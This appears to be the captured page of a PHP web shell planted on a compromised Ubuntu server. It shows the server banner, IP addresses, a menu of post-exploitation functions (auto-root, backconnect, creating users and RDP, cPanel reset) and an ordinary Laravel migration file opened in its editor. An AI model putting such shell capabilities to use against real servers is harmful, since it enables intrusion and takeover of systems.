Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.155.72
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
database /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
2022_07_14_062023_add_sorting_...
675
B
-rw-r--r--
2023_02_28_075610_create_servi...
1.18
KB
-rw-r--r--
2023_02_28_080254_create_proje...
1.22
KB
-rw-r--r--
2023_07_31_130808_add_column_t...
671
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2023_02_28_075610_create_services_table.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; class CreateServicesTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('services', function (Blueprint $table) { $table->id(); $table->string('title')->nullable(); $table->string('slug')->nullable(); $table->string('image')->nullable(); $table->string('display_order')->nullable(); $table->string('image_title')->nullable(); $table->string('image_alt')->nullable(); $table->string('meta_title')->nullable(); $table->string('meta_keywords')->nullable(); $table->string('meta_descriptions')->nullable(); $table->text('description')->nullable(); $table->enum('status' , ['active' , 'in-active'])->default('in-active'); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('services'); } }
Close